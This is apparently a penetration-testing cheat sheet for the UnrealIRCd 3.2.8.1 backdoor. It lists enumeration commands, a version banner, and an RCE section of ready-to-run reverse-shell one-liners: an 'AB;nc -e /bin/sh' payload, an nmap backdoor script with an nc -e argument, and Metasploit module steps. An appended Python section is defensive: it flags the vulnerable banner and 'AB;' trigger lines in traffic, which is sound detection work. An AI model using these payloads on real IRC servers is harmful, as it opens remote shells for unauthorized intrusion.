6697 - UnrealIRCd
Information
Default Port: 6697
PORT STATE SERVICE
6697/tcp open ircs-u
Enumeration
nc -vn 192.168.1.2 6697
timeout 0.1 bash -c "nc -nv 192.168.1.2 6697"
nmap -p6697 -sS 192.168.1.2
nmap -p6697 -sVC 192.168.1.2
nmap -p6697 --script=irc-unrealircd-backdoor.nse 192.168.1.2
Version
irssi -c 192.168.1.2 --port 6697
irssi -c 192.168.1.2 --port 6667
irssi -c 192.168.1.2 --port 8067
Irssi v1.4.5 - https://irssi.org
13:35 -!- Irssi: Looking up 192.168.1.89
13:35 -!- Irssi: The following settings were initialized
13:35 real_name root
13:35 user_name root
13:35 nick root
13:35 -!- Irssi: Connecting to 192.168.1.89 [192.168.1.89] port 6697
13:35 Waiting for CAP LS response...
13:35 -!- Irssi: Connection to 192.168.1.89 established
13:35 !irc.foonet.com *** Looking up your hostname...
13:35 !irc.foonet.com *** Couldn't resolve your hostname; using your IP address instead
13:35 -!- Welcome to the ROXnet IRC Network root_!root@192.168.1.5
13:35 -!- Your host is irc.foonet.com, running version Unreal3.2.8.1
13:35 -!- This server was created Sat 08 Aug EDT at 2020 07:03:52 PM
13:35 -!- irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
RCE
Netcat
nc -lvnp 443
echo "AB;nc -e /bin/sh 192.168.1.2 443" |nc 192.168.1.3 6697
Nmap
nc -lvnp 443
nmap -p6697 --script="irc-unrealircd-backdoor" --script-args=irc-unrealircd-backdoor.command="nc 192.168.1.2 443 -e /bin/sh" 192.168.1.3
Metasploit
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf > show options
msf > set RHOST 192.168.1.2
msf > exploit
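Detection side of the version banner and the "AB;" payload shown above, as an added example that is not part of the original notes. The function names and sample lines are constructed for illustration, and the trigger check assumes the monitor sees plaintext client-to-server lines.

```python
import re

# Version string taken from the banner shown on this page.
FLAGGED_VERSION = "Unreal3.2.8.1"
# "running version X" is how the server's welcome line reports its version.
VERSION_RE = re.compile(r"running version (\S+)")
# The payload on this page puts "AB;" at the very start of a line.
# A normal client line starts with a command word and a space
# (NICK, USER, CAP ...), so "AB;" in that position is not valid IRC.
TRIGGER_RE = re.compile(rb"^AB;(.*)$")


def server_version(banner_lines):
    """Return the version token from the first banner line that has one."""
    for line in banner_lines:
        m = VERSION_RE.search(line)
        if m:
            return m.group(1).rstrip(".,")
    return None


def find_triggers(client_lines):
    """Return (source, command_text) for each client line that matches."""
    hits = []
    for src, raw in client_lines:
        m = TRIGGER_RE.match(raw.rstrip(b"\r\n"))
        if m:
            hits.append((src, m.group(1).decode("latin-1")))
    return hits


# Constructed sample data: banner lines in irssi format, and plaintext
# client-to-server lines tagged with their source address.
SAMPLE_BANNER = [
    "13:35 -!- Welcome to the ROXnet IRC Network root_!root@192.168.1.5",
    "13:35 -!- Your host is irc.foonet.com, running version Unreal3.2.8.1",
]
SAMPLE_CLIENT_LINES = [
    ("192.168.1.5", b"CAP LS\r\n"),
    ("192.168.1.5", b"NICK root\r\n"),
    ("192.168.1.2", b"AB;nc -e /bin/sh 192.168.1.2 443\n"),
    ("192.168.1.5", b"PRIVMSG #ops :ABC; see you later\r\n"),
]

if __name__ == "__main__":
    version = server_version(SAMPLE_BANNER)
    print("version:", version, "flagged:", version == FLAGGED_VERSION)
    for src, cmd in find_triggers(SAMPLE_CLIENT_LINES):
        print(f"backdoor trigger from {src}: {cmd!r}")
```

A banner match only says which release is running, so treat it as a reason to inspect the build; the trigger match is the stronger signal because that line is never valid client traffic.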